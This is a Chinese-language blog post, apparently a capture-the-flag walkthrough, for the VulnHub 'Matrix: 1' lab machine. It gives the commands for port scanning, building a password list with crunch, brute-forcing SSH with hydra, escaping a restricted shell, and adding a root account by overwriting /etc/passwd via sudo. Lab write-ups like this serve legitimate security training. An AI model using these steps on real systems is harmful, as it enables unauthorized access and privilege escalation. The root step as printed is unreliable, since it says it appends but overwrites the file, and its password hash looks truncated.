VulnHub-MATRIX: 1

环境


Kali: 192.168.132.131

靶机:192.168.132.152 靶机地址:http://www.vulnhub.com/entry/matrix-1,259/

一、信息收集


arp-scan -l

nmap -p- -sC -sV 192.168.132.152

http://192.168.132.152:80/

查看源代码,发现一张图片

文件名为:p0rt_31337.png 发现31337端口有关

http://192.168.132.152:31337/

二、漏洞探测


查看源代码,查看加密内容,看密文可能是base64加密

解密,发现该网站下存在Cypher.matrix文件

访问并下载文件,用记事本打开

http://192.168.132.152:31337/Cypher.matrix

看密文为Brainfuck加密,进行解密

三、漏洞验证


查看密码库

cat /usr/share/crunch/charset.lst

制作密码字典

crunch 8 8 -f /usr/share/crunch/charset.lst lalpha-numeric -t k1ll0r@@ > password.dict

进行暴力破解ssh

hydra -l guest -P password.dict ssh://192.168.132.152:22 -I -f -V

四、提权


由于bash shell功能受限,需要绕过

参考文章 https://www.freebuf.com/articles/system/188989.html

尝试可使用的命令

尝试重新登录ssh,进行绕过rbash

成功绕过

ssh guest@192.168.132.152 -t "bash --noprofile"

查看可sudo的命令

sudo -l

生成密文

openssl passwd -1 -salt hack hack123

将/etc/passwd复制出来

sudo cp /etc/passwd passwd

将生成密文追加到passwd文件中

echo 'hack:1hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root:/bin/bash' > passwd

将passwd复制到/etc/覆盖原passwd文件

sudo cp passwd /etc/passwd
su - hack

寻找flag吗,并查看

cat flag.txt

五、总结


扫描端口发现web服务器,查看源代码发现31337端口,访问并查看源代码发现Cypher.matrix目录,进行Brainfuck解密,获得残缺的密码,使用crunch工具生成密码字典,破解ssh密码,bash shell功能受限,需要绕过rbash,利用sudo进行提权,获得root权限。

posted @ 2021-09-25 23:16  纸机  阅读(110)  评论(0编辑  收藏  举报